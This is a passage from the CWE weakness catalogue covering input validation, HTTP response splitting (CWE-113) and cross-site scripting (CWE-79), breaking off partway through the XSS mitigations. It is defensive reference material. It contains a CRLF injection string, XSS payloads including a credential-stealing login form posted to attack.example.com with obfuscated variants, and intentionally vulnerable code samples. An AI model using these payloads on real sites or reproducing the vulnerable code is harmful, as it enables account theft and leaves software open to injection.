There is not much research into the classification of input validation techniques and their application. Many publicly-disclosed vulnerabilities simply characterize a problem as "input validation" without providing more specific details that might contribute to a deeper understanding of validation techniques and the weaknesses they can prevent or reduce. Validation is over-emphasized in contrast to other neutralization techniques such as filtering and enforcement by conversion. See the vulnerability theory paper.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsInput validation and representation
OWASP Top Ten 2004A1CWE More SpecificUnvalidated Input
CERT C Secure CodingERR07-CPrefer functions that support error checking over equivalent functions that don't
CERT C Secure CodingINT06-CUse strtol() or a related function to convert a string token to an integer
CERT C Secure CodingMEM10-CDefine and use a pointer validation function
CERT C Secure CodingMSC08-CLibrary functions should validate their parameters
WASC20Improper Input Handling
CERT C++ Secure CodingINT06-CPPUse strtol() or a related function to convert a string token to an integer
CERT C++ Secure CodingMEM10-CPPDefine and use a pointer validation function
CERT C++ Secure CodingMSC08-CPPFunctions should validate their parameters
Software Fault PatternsSFP25Tainted input to variable
+ References
Jim Manico. "Input Validation with ESAPI - Very Important". 2008-08-15. <http://manicode.blogspot.com/2008/08/input-validation-with-esapi.html>.
[REF-21] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
Joel Scambray, Mike Shema and Caleb Sima. "Hacking Exposed Web Applications, Second Edition". Input Validation Attacks. McGraw-Hill. 2006-06-05.
Jeremiah Grossman. "Input validation or output filtering, which is better?". 2007-01-30. <http://jeremiahgrossman.blogspot.com/2007/01/input-validation-or-output-filtering.html>.
Kevin Beaver. "The importance of input validation". 2006-09-06. <http://searchsoftwarequality.techtarget.com/tip/0,289483,sid92_gci1214373,00.html>.
[REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 10, "All Input Is Evil!" Page 341. 2nd Edition. Microsoft. 2002.
+ Maintenance Notes

Input validation - whether missing or incorrect - is such an essential and widespread part of secure development that it is implicit in many different weaknesses. Traditionally, problems such as buffer overflows and XSS have been classified as input validation problems by many security professionals. However, input validation is not necessarily the only protection mechanism available for avoiding such problems, and in some cases it is not even sufficient. The CWE team has begun capturing these subtleties in chains within the Research Concepts view (CWE-1000), but more work is needed.

+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Potential_Mitigations, Time_of_Introduction
2008-08-15VeracodeExternal
Suggested OWASP Top Ten 2004 mapping
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2008-11-24CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships
2009-03-10CWE Content TeamMITREInternal
updated Description, Potential_Mitigations
2009-05-27CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2009-07-27CWE Content TeamMITREInternal
updated Relationships
2009-10-29CWE Content TeamMITREInternal
updated Common_Consequences, Demonstrative_Examples, Maintenance_Notes, Modes_of_Introduction, Observed_Examples, Relationships, Research_Gaps, Terminology_Notes
2009-12-28CWE Content TeamMITREInternal
updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors
2010-02-16CWE Content TeamMITREInternal
updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings
2010-04-05CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Potential_Mitigations, Research_Gaps, Terminology_Notes
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations, Relationships
2010-12-13CWE Content TeamMITREInternal
updated Demonstrative_Examples, Description
2011-03-29CWE Content TeamMITREInternal
updated Observed_Examples
2011-06-01CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Relationship_Notes
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-02-21CWE Content TeamMITREInternal
updated Relationships
2013-07-17CWE Content TeamMITREInternal
updated Relationships
2014-02-18CWE Content TeamMITREInternal
updated Demonstrative_Examples, Related_Attack_Patterns
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
2017-01-19CWE Content TeamMITREInternal
updated Related_Attack_Patterns, Relationships
2017-05-03CWE Content TeamMITREInternal
updated Related_Attack_Patterns, Relationships
Previous Entry Names
Change DatePrevious Entry Name
2009-01-12Insufficient Input Validation

CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')

Weakness ID: 113
Abstraction: Base
Status: Incomplete
Presentation Filter:
+ Description

Description Summary

The software receives data from an upstream component, but does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.

Extended Description

Including unvalidated data in an HTTP header allows an attacker to specify the entirety of the HTTP response rendered by the browser. When an HTTP request contains unexpected CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n) characters, the server may respond with an output stream that is interpreted as two different HTTP responses (instead of one). An attacker can control the second response and mount attacks such as cross-site scripting and cache poisoning.

HTTP response splitting weaknesses may be present when:

  1. Data enters a web application through an untrusted source, most frequently an HTTP request.

  2. The data is included in an HTTP response header sent to a web user without being validated for malicious characters.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

All

+ Common Consequences
ScopeEffect
Integrity
Access Control

Technical Impact: Modify application data; Gain privileges / assume identity

CR and LF characters in an HTTP header may give attackers control of the remaining headers and body of the response the application intends to send, as well as allowing them to create additional responses entirely under their control.

+ Demonstrative Examples

Example 1

The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.

(Bad Code)
Example Language: Java 
String author = request.getParameter(AUTHOR_PARAM);
...
Cookie cookie = new Cookie("author", author);
cookie.setMaxAge(cookieExpiration);
response.addCookie(cookie);

Assuming a string consisting of standard alpha-numeric characters, such as "Jane Smith", is submitted in the request, the HTTP response including this cookie might take the following form:

(Good Code)
 
HTTP/1.1 200 OK
...
Set-Cookie: author=Jane Smith
...

However, because the value of the cookie is formed from unvalidated user input, the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as

(Attack)
 
Wiley Hacker\r\nHTTP/1.1 200 OK\r\n

then the HTTP response would be split into two responses of the following form:

(Bad Code)
 
HTTP/1.1 200 OK
...
Set-Cookie: author=Wiley Hacker HTTP/1.1 200 OK
...

Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The attacker's ability to construct arbitrary HTTP responses permits a variety of resulting attacks, including:

  • cross-user defacement

  • web and browser cache poisoning

  • cross-site scripting

  • page hijacking

Example 2

Cross-User Defacement

An attacker can make a single request to a vulnerable server that will cause the server to create two responses, the second of which may be misinterpreted as a response to a different request, possibly one made by another user sharing the same TCP connection with the server. This can be accomplished by convincing the user to submit the malicious request themselves, or remotely in situations where the attacker and the user share a common TCP connection to the server, such as a shared proxy server.

  • In the best case, an attacker can leverage this ability to convince users that the application has been hacked, causing users to lose confidence in the security of the application.

  • In the worst case, an attacker may provide specially crafted content designed to mimic the behavior of the application but redirect private information, such as account numbers and passwords, back to the attacker.

Example 3

Cache Poisoning

The impact of a maliciously constructed response can be magnified if it is cached either by a web cache used by multiple users or even the browser cache of a single user. If a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue to receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although only the user of the local browser instance will be affected.

Example 4

Cross-Site Scripting

Once attackers have control of the responses sent by an application, they can deliver a variety of malicious content to users. Cross-site scripting is a common form of attack in which malicious JavaScript or other code included in a response is executed in the user's browser.

The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.

The most common and dangerous attack vector against users of a vulnerable application uses JavaScript to transmit session and authentication information back to the attacker who can then take complete control of the victim's account.

Example 5

Page Hijacking

In addition to using a vulnerable application to send malicious content to a user, the same root vulnerability can also be leveraged to redirect sensitive content generated by the server and intended for the user to the attacker instead. By submitting a request that results in two responses, the intended response from the server and the response generated by the attacker, an attacker can cause an intermediate node, such as a shared proxy server, to misdirect a response generated by the server for the user to the attacker.

Because the request made by the attacker generates two responses, the first is interpreted as a response to the attacker's request, while the second remains in limbo. When the user makes a legitimate request through the same TCP connection, the attacker's request is already waiting and is interpreted as a response to the victim's request. The attacker then sends a second request to the server, to which the proxy server responds with the server-generated response intended for the victim, thereby compromising any sensitive information in the headers or body of the response intended for the victim.

+ Observed Examples
ReferenceDescription
Application accepts CRLF in an object ID, allowing HTTP response splitting.
HTTP response splitting via CRLF in parameter related to URL.
HTTP response splitting via CRLF in parameter related to URL.
Bulletin board allows response splitting via CRLF in parameter.
Bulletin board allows response splitting via CRLF in parameter.
Response splitting via CRLF in PHPSESSID.
Chain: Application accepts CRLF in an object ID, allowing HTTP response splitting.
Chain: HTTP response splitting via CRLF in parameter related to URL.
+ Potential Mitigations

Phase: Implementation

Strategy: Input Validation

Construct HTTP headers very carefully, avoiding the use of non-validated input data.
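
One way to apply this, sketched below, is to reject any header or cookie value that contains a CR or LF character before it reaches the response; stripping the characters instead is another reasonable policy:

(Good Code)
Example Language: Java 
// Sketch: refuse header/cookie values that contain CR or LF rather than
// letting them reach the outgoing response.
static String requireSingleHeaderLine(String value) {
    if (value == null || value.indexOf('\r') >= 0 || value.indexOf('\n') >= 0) {
        throw new IllegalArgumentException("header value must not contain CR or LF");
    }
    return value;
}

In the weblog example above, the author value taken from the request would be passed through such a check before being placed in the Set-Cookie header.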

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

Phase: Implementation

Strategy: Output Encoding

Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.

Phase: Implementation

Strategy: Input Validation

Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass whitelist validation schemes by introducing dangerous inputs after they have been checked.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class20Improper Input Validation
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness BaseWeakness Base93Improper Neutralization of CRLF Sequences ('CRLF Injection')
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory442Web Problems
Development Concepts (primary)699
ChildOfCategoryCategory990SFP Secondary Cluster: Tainted Input to Command
Software Fault Pattern (SFP) Clusters (primary)888
CanPrecedeWeakness BaseWeakness Base79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Research Concepts1000
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
+ Theoretical Notes

HTTP response splitting is probably only multi-factor in an environment that uses intermediaries.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERHTTP response splitting
7 Pernicious KingdomsHTTP Response Splitting
WASC25HTTP Response Splitting
Software Fault PatternsSFP24Tainted input to command
+ References
[REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and Response Splitting)." Page 31. McGraw-Hill. 2010.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated References, Potential_Mitigations, Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Observed_Example, Other_Notes, References, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Description
2008-11-24CWE Content TeamMITREInternal
updated Description, Other_Notes
2009-03-10CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-05-27CWE Content TeamMITREInternal
updated Name
2009-07-27CWE Content TeamMITREInternal
updated Demonstrative_Examples, Potential_Mitigations
2009-10-29CWE Content TeamMITREInternal
updated Common_Consequences, Description, Other_Notes, Theoretical_Notes
2010-02-16CWE Content TeamMITREInternal
updated Taxonomy_Mappings
2010-06-21CWE Content TeamMITREInternal
updated Description, Name
2011-03-29CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Description
2012-05-11CWE Content TeamMITREInternal
updated Common_Consequences, References, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-06-23CWE Content TeamMITREInternal
updated Demonstrative_Examples
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
2017-05-03CWE Content TeamMITREInternal
updated Related_Attack_Patterns
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11HTTP Response Splitting
2009-05-27Failure to Sanitize CRLF Sequences in HTTP Headers (aka 'HTTP Response Splitting')
2010-06-21Failure to Sanitize CRLF Sequences in HTTP Headers ('HTTP Response Splitting')

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Weakness ID: 79
Abstraction: Base
Status: Usable
Presentation Filter:
+ Description

Description Summary

The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Extended Description

Cross-site scripting (XSS) vulnerabilities occur when:

1. Untrusted data enters a web application, typically from a web request.

2. The web application dynamically generates a web page that contains this untrusted data.

3. During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc.

4. A victim visits the generated web page through a web browser, which contains malicious script that was injected using the untrusted data.

5. Since the script comes from a web page that was sent by the web server, the victim's web browser executes the malicious script in the context of the web server's domain.

6. This effectively violates the intention of the web browser's same-origin policy, which states that scripts in one domain should not be able to access resources or run code in a different domain.

There are three main kinds of XSS:

Type 1: Reflected XSS (or Non-Persistent)

The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser.

Type 2: Stored XSS (or Persistent)

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs.

Type 0: DOM-Based XSS

In DOM-based XSS, the client performs the injection of XSS into the page; in the other types, the server performs the injection. DOM-based XSS generally involves server-controlled, trusted script that is sent to the client, such as Javascript that performs sanity checks on a form before the user submits it. If the server-supplied script processes user-supplied data and then injects it back into the web page (such as with dynamic HTML), then DOM-based XSS is possible.

Once the malicious script is injected, the attacker can perform a variety of malicious activities. The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim's account on that web site. Finally, the script could exploit a vulnerability in the web browser itself possibly taking over the victim's machine, sometimes referred to as "drive-by hacking."

In many cases, the attack can be launched without the victim even being aware of it. Even with careful users, attackers frequently use a variety of methods to encode the malicious portion of the attack, such as URL encoding or Unicode, so the request looks less suspicious.

+ Alternate Terms
XSS
CSS:

"CSS" was once used as the acronym for this problem, but this could cause confusion with "Cascading Style Sheets," so usage of this acronym has declined significantly.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

Architectural Paradigms

Web-based: (Often)

Technology Classes

Web-Server: (Often)

Platform Notes

XSS flaws are very common in web applications because avoiding them requires a great deal of developer discipline.

+ Common Consequences
ScopeEffect
Access Control
Confidentiality

Technical Impact: Bypass protection mechanism; Read application data

The most common attack performed with cross-site scripting involves the disclosure of information stored in user cookies. Typically, a malicious user will craft a client-side script, which -- when parsed by a web browser -- performs some activity (such as sending all site cookies to a given E-mail address). This script will be loaded and run by each user visiting the web site. Since the site requesting to run the script has access to the cookies in question, the malicious script does also.

Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

In some circumstances it may be possible to run arbitrary code on a victim's computer when cross-site scripting is combined with other flaws.

Confidentiality
Integrity
Availability
Access Control

Technical Impact: Execute unauthorized code or commands; Bypass protection mechanism; Read application data

The consequence of an XSS attack is the same regardless of whether it is stored or reflected. The difference is in how the payload arrives at the server.

XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. Some cross-site scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running ActiveX controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content.

+ Likelihood of Exploit

High to Very High

+ Enabling Factors for Exploitation

Cross-site scripting attacks may occur anywhere that potentially malicious users are allowed to post unregulated material to a trusted web site for the consumption of other valid users, commonly in places such as bulletin-board web sites that provide web-based mailing list-style functionality.

Stored XSS got its start with web sites that offered a "guestbook" to visitors. Attackers would include JavaScript in their guestbook entries, and all subsequent visitors to the guestbook page would execute the malicious code. As the examples demonstrate, XSS vulnerabilities are caused by code that includes unvalidated data in an HTTP response.

+ Detection Methods

Automated Static Analysis

Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible, especially when multiple components are involved.

Effectiveness: Moderate

Black Box

Use the XSS Cheat Sheet [R.79.6] or automated test-generation tools to help launch a wide variety of attacks against your web application. The Cheat Sheet contains many subtle XSS variations that are specifically targeted against weak XSS defenses.

Effectiveness: Moderate

With Stored XSS, the indirection caused by the data store can make it more difficult to find the problem. The tester must first inject the XSS string into the data store, then find the appropriate application functionality in which the XSS string is sent to other users of the application. These are two distinct steps in which the activation of the XSS can take place minutes, hours, or days after the XSS was originally injected into the data store.

+ Demonstrative Examples

Example 1

This code displays a welcome message on a web page based on the HTTP GET username parameter. This example covers a Reflected XSS (Type 1) scenario.

(Bad Code)
Example Language: PHP 
$username = $_GET['username'];
echo '<div class="header"> Welcome, ' . $username . '</div>';

Because the parameter can be arbitrary, the URL of the page could be modified so that $username contains scripting syntax, such as:

(Attack)
 
http://trustedSite.example.com/welcome.php?username=<Script Language="Javascript">alert("You've been attacked!");</Script>

This results in a harmless alert dialogue popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers.

More realistically, the attacker can embed a fake login box on the page, tricking the user into sending his password to the attacker:

(Attack)
 
http://trustedSite.example.com/welcome.php?username=<div id="stealPassword">Please Login:<form name="input" action="http://attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><input type="submit" value="Login" /></form></div>

If a user clicks on this link, then welcome.php will generate the following HTML and send it to the user's browser:

(Result)
 
<div class="header"> Welcome,
<div id="stealPassword">Please Login:
<form name="input" action="attack.example.com/stealPassword.php" method="post">
Username: <input type="text" name="username" />
<br/>
Password: <input type="password" name="password" />
<input type="submit" value="Login" />
</form>
</div>
</div>

The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability):

(Attack)
 
trustedSite.example.com/welcome.php?username=%3Cdiv+id%3D%22
stealPassword%22%3EPlease+Login%3A%3Cform+name%3D%22input
%22+action%3D%22http%3A%2F%2Fattack.example.com%2FstealPassword.php
%22+method%3D%22post%22%3EUsername%3A+%3Cinput+type%3D%22text
%22+name%3D%22username%22+%2F%3E%3Cbr%2F%3EPassword%3A
+%3Cinput+type%3D%22password%22+name%3D%22password%22
+%2F%3E%3Cinput+type%3D%22submit%22+value%3D%22Login%22
+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A

The same attack string could also be obfuscated as:

(Attack)
 
trustedSite.example.com/welcome.php?username=<script+type="text/javascript">
document.write('\u003C\u0064\u0069\u0076\u0020\u0069\u0064\u003D\u0022\u0073
\u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064
\u0022\u003E\u0050\u006C\u0065\u0061\u0073\u0065\u0020\u004C\u006F\u0067
\u0069\u006E\u003A\u003C\u0066\u006F\u0072\u006D\u0020\u006E\u0061\u006D
\u0065\u003D\u0022\u0069\u006E\u0070\u0075\u0074\u0022\u0020\u0061\u0063
\u0074\u0069\u006F\u006E\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F
\u002F\u0061\u0074\u0074\u0061\u0063\u006B\u002E\u0065\u0078\u0061\u006D
\u0070\u006C\u0065\u002E\u0063\u006F\u006D\u002F\u0073\u0074\u0065\u0061
\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u002E\u0070\u0068
\u0070\u0022\u0020\u006D\u0065\u0074\u0068\u006F\u0064\u003D\u0022\u0070
\u006F\u0073\u0074\u0022\u003E\u0055\u0073\u0065\u0072\u006E\u0061\u006D
\u0065\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079
\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u0022\u0020\u006E\u0061
\u006D\u0065\u003D\u0022\u0075\u0073\u0065\u0072\u006E\u0061\u006D\u0065
\u0022\u0020\u002F\u003E\u003C\u0062\u0072\u002F\u003E\u0050\u0061\u0073
\u0073\u0077\u006F\u0072\u0064\u003A\u0020\u003C\u0069\u006E\u0070\u0075
\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0070\u0061\u0073\u0073
\u0077\u006F\u0072\u0064\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022
\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u002F\u003E
\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D
\u0022\u0073\u0075\u0062\u006D\u0069\u0074\u0022\u0020\u0076\u0061\u006C
\u0075\u0065\u003D\u0022\u004C\u006F\u0067\u0069\u006E\u0022\u0020\u002F
\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D');</script>

Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs.
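
One way to remove the reflected XSS from welcome.php (a minimal sketch, not the only possible defense; see the Potential Mitigations section for the full range of strategies) is to HTML-encode the parameter before it is echoed:

(Good Code)
Example Language: PHP 
$username = $_GET['username'];
// Encode HTML metacharacters so the value is rendered as text instead of being parsed as markup.
echo '<div class="header"> Welcome, ' . htmlspecialchars($username, ENT_QUOTES, 'UTF-8') . '</div>';

With this change, the injected <div> and <form> markup from the attack URLs above would be displayed as literal text rather than rendered by the browser.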

Example 2

This example also displays a Reflected XSS (Type 1) scenario.

The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.

(Bad Code)
Example Language: JSP 
<% String eid = request.getParameter("eid"); %>
...
Employee ID: <%= eid %>

The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user.

(Bad Code)
Example Language: ASP.NET 
...
protected System.Web.UI.WebControls.TextBox Login;
protected System.Web.UI.WebControls.Label EmployeeID;
...
EmployeeID.Text = Login.Text;
... (HTML follows) ...
<p><asp:label id="EmployeeID" runat="server" /></p>
...

The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response.

Example 3

This example covers a Stored XSS (Type 2) scenario.

The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name.

(Bad Code)
Example Language: JSP 
<%
...
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery("select * from emp where id="+eid);
if (rs != null) {
rs.next();
String name = rs.getString("name");
%>

Employee Name: <%= name %>

The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID.

(Bad Code)
Example Language: ASP.NET 
protected System.Web.UI.WebControls.Label EmployeeName;
...
string query = "select * from emp where id=" + eid;
sda = new SqlDataAdapter(query, conn);
sda.Fill(dt);
string name = dt.Rows[0]["Name"].ToString();
...
EmployeeName.Text = name;

This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser.

Example 4

The following example consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario.

CreateUser.php

(Bad Code)
Example Language: PHP 
$username = mysql_real_escape_string($username);
$fullName = mysql_real_escape_string($fullName);
$query = sprintf('Insert Into users (username,password,fullname) Values ("%s","%s","%s")', $username, crypt($password), $fullName);
mysql_query($query);
/.../

The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information:

ListUsers.php

(Bad Code)
Example Language: PHP 
$query = 'Select * From users Where loggedIn=true';
$results = mysql_query($query);
if (!$results) {
exit;
}
//Print list of users to page
echo '<div id="userlist">Currently Active Users:';
while ($row = mysql_fetch_assoc($results)) {
echo '<div class="userNames">'.$row['fullname'].'</div>';
}
echo '</div>';

The attacker can set his name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password-stealing login form like the one shown in Example 1.
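
A minimal sketch of one possible correction to ListUsers.php (keeping the example's original mysql_* calls) is to encode each stored name at the point where it is written into the page:

(Good Code)
Example Language: PHP 
echo '<div id="userlist">Currently Active Users:';
while ($row = mysql_fetch_assoc($results)) {
    // Encode on output so any HTML stored in the fullname column is displayed, not executed.
    echo '<div class="userNames">' . htmlspecialchars($row['fullname'], ENT_QUOTES, 'UTF-8') . '</div>';
}
echo '</div>';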

+ Observed Examples
Reference / Description
Chain: protection mechanism failure allows XSS
Chain: only checks "javascript:" tag
Chain: only removes SCRIPT tags, enabling XSS
Reflected XSS using the PATH_INFO in a URL
Reflected XSS not properly handled when generating an error message
Reflected XSS sent through email message.
Stored XSS in a security product.
Stored XSS using a wiki page.
Stored XSS in a guestbook application.
Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag.
Chain: library file is not protected against a direct request (CWE-425), leading to reflected XSS.
+ Potential Mitigations

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Parts of the same output document may require different encodings, which will vary depending on whether the output is in the:

  • HTML body

  • Element attributes (such as src="XYZ")

  • URIs

  • JavaScript sections

  • Cascading Style Sheets and style property

  • etc.

Note that HTML Entity Encoding is only appropriate for the HTML body.

Consult the XSS Prevention Cheat Sheet [R.79.16] for more details on the types of encoding and escaping that are needed.
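
As an informal illustration of the point above (a sketch, not taken from the Cheat Sheet), the same untrusted value needs a different encoding call in PHP depending on the context into which it is written:

(Good Code)
Example Language: PHP 
$untrusted = $_GET['q'];

// HTML body: HTML-entity-encode the value.
echo '<p>Results for ' . htmlspecialchars($untrusted, ENT_QUOTES, 'UTF-8') . '</p>';

// Quoted element attribute: entity-encode and always keep the surrounding quotes.
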